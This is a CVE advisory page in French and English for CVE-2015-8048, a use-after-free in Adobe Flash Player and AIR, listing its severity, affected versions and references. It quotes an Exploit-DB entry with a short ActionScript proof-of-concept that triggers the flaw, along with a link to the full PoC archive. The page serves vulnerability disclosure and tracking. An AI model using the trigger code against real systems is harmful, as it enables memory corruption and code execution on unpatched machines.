English
Français
Light
Dark
System

CVEFind - Alertes CVE

Restez informé en continue
Créer un compte Ouvrez un compte Simple et Gratuit Se connecter Gérez vos alertes

CVE-2015-8048 : Détail

CVE-2015-8048

90.62%V3
Network
2015-12-10 01:00 +00:00
2017-09-07 07:57 +00:00
CVE.org
NVD

Alerte pour un CVE

Restez informé de toutes modifications pour un CVE spécifique.
Gestion des alertes

Descriptions

Use-after-free vulnerability in Adobe Flash Player before 18.0.0.268 and 19.x and 20.x before 20.0.0.228 on Windows and OS X and before 11.2.202.554 on Linux, Adobe AIR before 20.0.0.204, Adobe AIR SDK before 20.0.0.204, and Adobe AIR SDK & Compiler before 20.0.0.204 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2015-8049, CVE-2015-8050, CVE-2015-8055, CVE-2015-8056, CVE-2015-8057, CVE-2015-8058, CVE-2015-8059, CVE-2015-8061, CVE-2015-8062, CVE-2015-8063, CVE-2015-8064, CVE-2015-8065, CVE-2015-8066, CVE-2015-8067, CVE-2015-8068, CVE-2015-8069, CVE-2015-8070, CVE-2015-8071, CVE-2015-8401, CVE-2015-8402, CVE-2015-8403, CVE-2015-8404, CVE-2015-8405, CVE-2015-8406, CVE-2015-8410, CVE-2015-8411, CVE-2015-8412, CVE-2015-8413, CVE-2015-8414, CVE-2015-8420, CVE-2015-8421, CVE-2015-8422, CVE-2015-8423, CVE-2015-8424, CVE-2015-8425, CVE-2015-8426, CVE-2015-8427, CVE-2015-8428, CVE-2015-8429, CVE-2015-8430, CVE-2015-8431, CVE-2015-8432, CVE-2015-8433, CVE-2015-8434, CVE-2015-8435, CVE-2015-8436, CVE-2015-8437, CVE-2015-8441, CVE-2015-8442, CVE-2015-8447, CVE-2015-8448, CVE-2015-8449, CVE-2015-8450, CVE-2015-8452, and CVE-2015-8454.

Informations

Metrics

Metric Score Sévérité CVSS Vecteur Source
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

EPSS Score

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

EPSS Percentile

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 39649

Date de publication : 2016-03-31 22:00 +00:00
Auteur : Google Security Research
EDB Vérifié : Yes

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=611 There is a use-after-free in URLStream.readObject. If the object read is a registered class, the constructor will get invoked to create the object. If the constructor calls URLStream.close, the URLStream will get freed, and then the deserialization function will continue to write to it. A minimal PoC is as follows: //In main flash.net.registerClassAlias("bob", myclass); var u:URLStream = new URLStream(); myclass.u = u; u.addEventListener(Event.COMPLETE, func); u.load(new URLRequest("file.txt")); function func(){ trace(u.readObject()); } // in myclass static public var u; public function myclass() { u.close(); } A sample script and SWF are attached. Note that file.txt needs to be in the same folder as getproperty.swf on a remote server. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39649.zip

Products Mentioned

Configuraton 0

Adobe>>Air_sdk >> Version To (including) 19.0.0.241

Adobe>>Air_sdk_\&_compiler >> Version To (including) 19.0.0.241

Apple>>Iphone_os >> Version *

Apple>>Mac_os_x >> Version *

Google>>Android >> Version *

Microsoft>>Windows >> Version *

Configuraton 0

Adobe>>Flash_player >> Version To (including) 11.2.202.548

Linux>>Linux_kernel >> Version *

Configuraton 0

Adobe>>Air >> Version To (including) 19.0.0.241

Apple>>Mac_os_x >> Version *

Microsoft>>Windows >> Version *

Configuraton 0

Adobe>>Flash_player >> Version To (including) 18.0.0.261

Adobe>>Flash_player >> Version 19.0.0.185

Adobe>>Flash_player >> Version 19.0.0.207

Adobe>>Flash_player >> Version 19.0.0.226

Adobe>>Flash_player >> Version 19.0.0.245

Apple>>Mac_os_x >> Version *

Microsoft>>Windows >> Version *

References

https://www.exploit-db.com/exploits/39649/
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.securityfocus.com/bid/78715
Tags : vdb-entry, x_refsource_BID
http://www.securitytracker.com/id/1034318
Tags : vdb-entry, x_refsource_SECTRACK
https://security.gentoo.org/glsa/201601-03
Tags : vendor-advisory, x_refsource_GENTOO

Plus d'informations
Cliquez sur le bouton à gauche (OFF), pour autoriser l'inscription de cookie améliorant les fonctionnalités du site. Cliquez sur le bouton à gauche (Tout accepter), pour ne plus autoriser l'inscription de cookie améliorant les fonctionnalités du site.